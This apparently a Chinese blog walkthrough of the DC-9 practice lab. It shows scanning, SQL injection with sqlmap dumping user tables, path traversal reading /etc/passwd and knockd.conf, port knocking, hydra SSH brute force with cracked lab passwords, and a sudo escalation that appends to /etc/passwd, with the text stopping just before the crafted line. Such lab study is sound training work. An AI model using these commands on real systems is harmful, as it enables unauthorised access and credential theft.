<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zh1yu.xyz","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="本次学习的是DC-9靶机，涉及到端口扫描，目录扫描，文件包含，端口敲门服务，sql注入，hydra爆破，sudo之脚本提权，openssl生成hash值">
<meta property="og:type" content="article">
<meta property="og:title" content="DC-9靶机复现">
<meta property="og:url" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="知鱼的Blog">
<meta property="og:description" content="本次学习的是DC-9靶机，涉及到端口扫描，目录扫描，文件包含，端口敲门服务，sql注入，hydra爆破，sudo之脚本提权，openssl生成hash值">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/1.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/2.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/3.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/4.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/5.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/6.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/7.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/8.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/9.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/10.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/11.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/12.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/13.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/14.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/15.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/16.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/17.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/18.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/19.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/20.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/21.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/22.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/23.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/24.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/25.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/26.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/27.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/28.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/30.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/31.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/32.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/33.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/36_1.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/34.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/35.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/36.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/37.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/38.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/38_1.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/39.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/41_1.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/40.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/41.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/42.png">
<meta property="og:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/43.png">
<meta property="article:published_time" content="2025-06-16T13:17:13.000Z">
<meta property="article:modified_time" content="2025-06-17T09:06:21.433Z">
<meta property="article:author" content="zh1yu">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/1.png">

<link rel="canonical" href="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>DC-9靶机复现 | 知鱼的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">知鱼的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/zh1yu2.jpg">
      <meta itemprop="name" content="zh1yu">
      <meta itemprop="description" content="花有重开日,人无再少年">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="知鱼的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DC-9靶机复现
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-06-16 21:17:13" itemprop="dateCreated datePublished" datetime="2025-06-16T21:17:13+08:00">2025-06-16</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-06-17 17:06:21" itemprop="dateModified" datetime="2025-06-17T17:06:21+08:00">2025-06-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" itemprop="url" rel="index"><span itemprop="name">漏洞复现</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p> 本次学习的是DC-9靶机，涉及到端口扫描，目录扫描，文件包含，端口敲门服务，sql注入，hydra爆破，sudo之脚本提权，openssl生成hash值</p>
<span id="more"></span>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>查看靶机ip：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l</span><br></pre></td></tr></table></figure>
<p><img src="1.png" alt="图片"></p>
<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -p- 192.168.130.150</span><br></pre></td></tr></table></figure>
<p><img src="2.png" alt="图片"></p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u 192.168.130.150 -i 200</span><br></pre></td></tr></table></figure>
<p><img src="3.png" alt="图片"></p>
<p>这次好像没有啥有用的文件，那就登录web端看看有没有攻击点</p>
<p><img src="4.png" alt="图片"></p>
<p>在manage这里发现了有个登录页面，抓包然后用sqlmap爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.130.150/manage.php --data=<span class="string">&quot;username=1&amp;password=1&quot;</span> --batch</span><br></pre></td></tr></table></figure>
<p><img src="5.png" alt="图片"></p>
<p>爆破无果，只能尝试其他点</p>
<h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><p>在search页面发现有搜索栏，输入sql注入的万能密码测试</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27; or 1=1#</span></span><br></pre></td></tr></table></figure>
<p><img src="6.png" alt="图片"></p>
<p><img src="7.png" alt="图片"></p>
<p>全部内容都回显了，大概率是存在注入的，继续用sqlmap跑</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch</span><br></pre></td></tr></table></figure>
<p><img src="8.png" alt="图片"></p>
<p>存在延迟注入和联合注入，那我们就查找<strong>当前数据库</strong>：<code>--current-db</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch --current-db</span><br></pre></td></tr></table></figure>
<p><img src="9.png" alt="图片"></p>
<p>查找到当前数据库：<strong>staff</strong>，继续查表</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch -D <span class="string">&quot;Staff&quot;</span> -tables</span><br></pre></td></tr></table></figure>
<p><img src="10.png" alt="图片"></p>
<p>两个表，但我们应该需要Users表，继续查找字段：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch -D <span class="string">&quot;Staff&quot;</span> -T <span class="string">&quot;Users&quot;</span> -columns</span><br></pre></td></tr></table></figure>
<p><img src="11.png" alt="图片"></p>
<p>查找出有用的字段：username和password，把这两个字段的内容输出：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch -D <span class="string">&quot;Staff&quot;</span> -T <span class="string">&quot;Users&quot;</span> -C <span class="string">&quot;Username,Password&quot;</span> --dump</span><br></pre></td></tr></table></figure>
<p><img src="12.png" alt="图片"></p>
<p>找到admin的密码，不过被md5加密了，到在线网站解密：<a target="_blank" rel="noopener" href="https://www.somd5.com/">https://www.somd5.com/</a></p>
<p><img src="13.png" alt="图片"></p>
<p><code>856f5de590ef37314e7c3bdf6f8a66dc</code>-<code>transorbital1</code></p>
<p>使用账号密码登录web端：</p>
<p><img src="14.png" alt="图片"></p>
<p>注意到左下角有<code>file does not exist</code>，盲猜存在文件包含，添加参数file=/etc/passwd</p>
<p><img src="15.png" alt="图片"></p>
<p>遗憾的是并没有回显内容，多次测试后发现有文件包含，只不过存在目录穿越</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.130.150/manage.php?file=../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>
<p><img src="16.png" alt="图片"></p>
<p>接下来尝试把file换成一句话木马，然后通过niginx服务器的日志文件拿下web服务</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/log/nginx/access.log</span><br></pre></td></tr></table></figure>
<p><img src="17.png" alt="图片"></p>
<p><img src="18.png" alt="图片"></p>
<p><img src="19.png" alt="图片"></p>
<p>很遗憾这里这样做行不通，并不能像dc-5那样操作</p>
<p>我们刚才在nmap扫端口的时候应该注意到了ssh的端口是filtered的状态，即认定服务端对ssh端口开启了防火墙，那我们需要尝试把这个端口给打开，这里利用到了端口敲门</p>
<p><img src="20.png" alt="图片"></p>
<blockquote>
<p>端口敲门（Port  Knocking）是一种安全措施，它通过在防火墙上动态打开端口来允许合法用户访问受保护的服务。具体来说，端口敲门技术要求用户在尝试连接到SSH服务之前，按照预定义的顺序访问一系列隐藏端口。这种技术通过在网络层添加额外的验证步骤，有效地隐藏了实际的服务端口，并减少了被暴力破解的风险。</p>
<h3 id="端口敲门的工作原理"><a href="#端口敲门的工作原理" class="headerlink" title="端口敲门的工作原理"></a><strong>端口敲门的工作原理</strong></h3><ol>
<li><strong>预定义端口序列</strong>：管理员设定一组特定的端口序列，例如，访问端口1111、2222和3333，顺序和时间间隔都非常重要。</li>
<li><strong>防火墙配置</strong>：防火墙初始配置为拒绝所有进入的SSH连接请求。</li>
<li><strong>敲门事件</strong>：用户在尝试SSH连接之前，必须按照正确的顺序和时间间隔访问预定义的端口序列。</li>
<li><strong>防火墙规则更新</strong>：当防火墙检测到正确的端口敲门序列时，它会暂时开放SSH端口（如22端口），允许该用户的IP地址连接SSH服务。</li>
<li><strong>连接和关闭</strong>：用户成功连接SSH后，防火墙可以设置为在一段时间后自动关闭SSH端口，以恢复安全状态。</li>
</ol>
</blockquote>
<p>所以我们就需要找到这个端口序列，端口序列通常置于<code>/etc/knockd.conf</code>文件下，我们利用目录遍历查看其内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.130.150/manage.php?file=../../../../etc/knockd.conf</span><br></pre></td></tr></table></figure>
<p><img src="21.png" alt="图片"></p>
<p>只需要按顺序访问这三个端口即可：<code>7469,8475,9842</code>，可以使用knock命令，也可以用nc</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt install knockd</span><br><span class="line">knock 192.168.130.150 7469 8475 9842</span><br></pre></td></tr></table></figure>
<p><img src="22.png" alt="图片"></p>
<p><img src="23.png" alt="图片"></p>
<p>或者：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.130.150 7469</span><br><span class="line">nc 192.168.130.150 8475</span><br><span class="line">nc 192.168.130.150 9842</span><br></pre></td></tr></table></figure>
<p>其实刚才我们sqlmap注入的时候只查看了当前数据库即web中的，但我们没查看是否还有其他数据库</p>
<p>下面就开始查找其他数据库的信息，换成<code>--dbs</code>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch --dbs</span><br><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch -D <span class="string">&quot;users&quot;</span> -tables</span><br><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch -D <span class="string">&quot;users&quot;</span> -T <span class="string">&quot;UserDetails&quot;</span> -columns</span><br><span class="line">sqlmap -u http://192.168.130.150/results.php --data=<span class="string">&quot;search=1&quot;</span> --batch -D <span class="string">&quot;users&quot;</span> -T <span class="string">&quot;UserDetails&quot;</span> -C <span class="string">&quot;username,password&quot;</span> --dump</span><br></pre></td></tr></table></figure>
<p><img src="24.png" alt="图片"></p>
<p><img src="25.png" alt="图片"></p>
<p><img src="26.png" alt="图片"></p>
<p><img src="27.png" alt="图片"></p>
<p>把所有账号密码打包到一个文件</p>
<p><img src="28.png" alt="图片"></p>
<p>然后把竖线和空格去掉，分别写入username和password文件里面：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">awk -F <span class="string">&#x27;|&#x27;</span> <span class="string">&#x27;&#123;print $2&#125;&#x27;</span> a.txt | <span class="built_in">tr</span> -d <span class="string">&#x27; &#x27;</span> &gt; username.txt</span><br><span class="line">awk -F <span class="string">&#x27;|&#x27;</span> <span class="string">&#x27;&#123;print $3&#125;&#x27;</span> a.txt | <span class="built_in">tr</span> -d <span class="string">&#x27; &#x27;</span> &gt; password.txt</span><br></pre></td></tr></table></figure>
<p><img src="30.png" alt="图片"></p>
<h2 id="hydra爆破"><a href="#hydra爆破" class="headerlink" title="hydra爆破"></a>hydra爆破</h2><p>然后使用hydra爆破：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -L username.txt -P password.txt 192.168.130.150 ssh</span><br></pre></td></tr></table></figure>
<p><img src="31.png" alt="图片"></p>
<p>有三个账号都可以登录，一个一个尝试：</p>
<p><code>[22][ssh] host: 192.168.130.150   login: chandlerb   password: UrAG0D!</code><br><code>[22][ssh] host: 192.168.130.150   login: joeyt   password: Passw0rd</code><br><code>[22][ssh] host: 192.168.130.150   login: janitor   password: Ilovepeepee</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ssh chandlerb@192.168.130.150</span><br><span class="line">ssh joeyt@192.168.130.150</span><br><span class="line">ssh janitor@192.168.130.150</span><br></pre></td></tr></table></figure>
<p><img src="32.png" alt="图片"></p>
<p><img src="33.png" alt="图片"></p>
<p>前两个用户都没有找到提权的信息，但在<code>janitor</code>用户找到一个隐藏文件</p>
<p>这里学习下这三个命令的不同之处：</p>
<p><img src="36_1.png" alt="图片"></p>
<p>接下来查看隐藏文件内容：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ls</span> -a</span><br><span class="line"><span class="built_in">cd</span> .secrets-for-putin</span><br><span class="line"><span class="built_in">cat</span> passwords-found-on-post-it-notes.txt</span><br></pre></td></tr></table></figure>
<p><img src="34.png" alt="图片"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">BamBam01</span><br><span class="line">Passw0rd</span><br><span class="line">smellycats</span><br><span class="line">P0Lic#10-4</span><br><span class="line">B4-Tru3-001</span><br><span class="line">4uGU5T-NiGHts</span><br></pre></td></tr></table></figure>
<p>这里看起来像账号和密码，把它们全加入到刚才生成的username和password文件，然后再用hydra跑一下</p>
<p><img src="35.png" alt="图片"></p>
<p>又跑出来一个账号密码：<code>[22][ssh] host: 192.168.130.150   login: fredf   password: B4-Tru3-001</code>，用这个登录ssh</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh fredf@192.168.130.150 </span><br></pre></td></tr></table></figure>
<p><img src="36.png" alt="图片"></p>
<h2 id="SUDO提权"><a href="#SUDO提权" class="headerlink" title="SUDO提权"></a>SUDO提权</h2><p>查看该用户拥有的权限：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> -l</span><br></pre></td></tr></table></figure>
<p><img src="37.png" alt="图片"></p>
<p>有一个脚本，查看下内容：</p>
<p><img src="38.png" alt="图片"></p>
<p>不好全是乱码，还是执行下吧！</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> /opt/devstuff/dist/test/test</span><br></pre></td></tr></table></figure>
<p><img src="38_1.png" alt="图片"></p>
<p>没法执行，但给了个提示：<code>test.py</code>，发现该文件在<code>/opt/devstuff/</code>目录下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /opt/devstuff/</span><br></pre></td></tr></table></figure>
<p><img src="39.png" alt="图片"></p>
<p>查看其内容：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> test.py</span><br></pre></td></tr></table></figure>
<p><img src="41_1.png" alt="图片"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff$ cat test.py</span><br><span class="line">#!/usr/bin/python</span><br><span class="line"></span><br><span class="line">import sys   #包含sys后 才能用sys.argv</span><br><span class="line">if len (sys.argv) != 3 :   #sys.argv[1] 是文件本身</span><br><span class="line">    print (&quot;Usage: python test.py read append&quot;)</span><br><span class="line">    sys.exit (1)</span><br><span class="line"></span><br><span class="line">else :</span><br><span class="line">    f = open(sys.argv[1], &quot;r&quot;) # r 以只读方式打开文件。文件的指针都放在文件开头。这是默认模式。</span><br><span class="line">    output = (f.read())</span><br><span class="line"></span><br><span class="line">    f = open(sys.argv[2], &quot;a&quot;) # a 打开一个文件用于追加。如果文件已存在，则文件的指针在文件结尾，若文件不存在，则创建新文件并写入。</span><br><span class="line">    f.write(output) #写入内容</span><br><span class="line">    f.close() # 关闭 </span><br></pre></td></tr></table></figure>
<p>所以只能往里面传2个参数，2个参数应该都是文件名，把第一个文件的内容以追加方式写进第二个文件里。</p>
<p>那我们可以创建一个带root用户信息的文件a.txt，然后把文件<code>a.txt</code>写入<code>/etc/passwd</code>文件，然后切换用户就可以拿到root权限了。</p>
<h3 id="openssl哈希"><a href="#openssl哈希" class="headerlink" title="openssl哈希"></a>openssl哈希</h3><p>linux自带openssl可以进行哈希计算，用法：<code>openssl passwd [-算法] [-salt 自定义盐值] &quot;你的密码&quot;</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd 123456</span><br></pre></td></tr></table></figure>
<p><img src="40.png" alt="图片"></p>
<p><code>/etc/passwd</code>文件中各字段的含义：<code>用户名:密码哈希:UID:GID:描述信息:家目录:登录Shell</code></p>
<p>把生成的hash及其它字段写入一个文件中：</p>
